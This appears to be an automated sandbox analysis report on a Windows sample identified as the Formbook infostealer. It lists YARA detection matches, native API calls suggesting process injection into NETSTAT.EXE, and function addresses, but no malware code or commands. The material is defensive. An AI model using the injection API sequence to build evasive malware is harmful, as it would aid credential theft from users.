          Source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00419E90 NtClose,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00419D5A NtCreateFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00419DB4 NtReadFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00419E0A NtReadFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BBB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BBA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BBAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9560 NtWriteFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BBA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BBA770 NtOpenThread,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_1_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_1_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_1_00419E90 NtClose,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_1_00419F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038AA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038AB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038AA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038AA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038AAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D69D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D69E90 NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D69E10 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D69F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D69DB4 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D69D5A NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D69E0A NtReadFile,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_004046A7
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_0040102E
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00402D8D
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00409E40
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_0041D669
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00409E3B
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_0041D743
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_0041CFA3
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA20A0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8B090
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C428EC
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C420A8
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31002
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C4E824
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B94120
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7F900
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C422AE
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAEBB0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3DBD2
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C303DA
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C42B28
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3D466
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8841F
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C425DD
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA2581
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8D5E0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C41D55
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B70D20
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C42D07
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C42EF7
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B96E30
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3D616
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C4DFCE
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C41FF1
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_1_0040102E
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_1_00401030
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389EBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392DBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03932B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_039322AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03884120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387B090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038920A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_039320A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_039328EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03921002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0393E824
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03931FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03932EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392D616
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03886E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_039325DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03932D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03860D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03931D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392D466
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D52D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D52D8D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D59E40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D59E3B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D52FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D6CFA3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D6D743
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0386B150 appears 35 times
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: String function: 00B7B150 appears 35 times
          Source: Y4U48592345670954.exe, 00000000.00000003.653543330.000000001F0BF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Y4U48592345670954.exe
          Source: Y4U48592345670954.exe, 00000002.00000002.689406887.0000000000B10000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs Y4U48592345670954.exe
          Source: Y4U48592345670954.exe, 00000002.00000002.689550397.0000000000C6F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Y4U48592345670954.exe
          Source: Y4U48592345670954.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@4/2
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
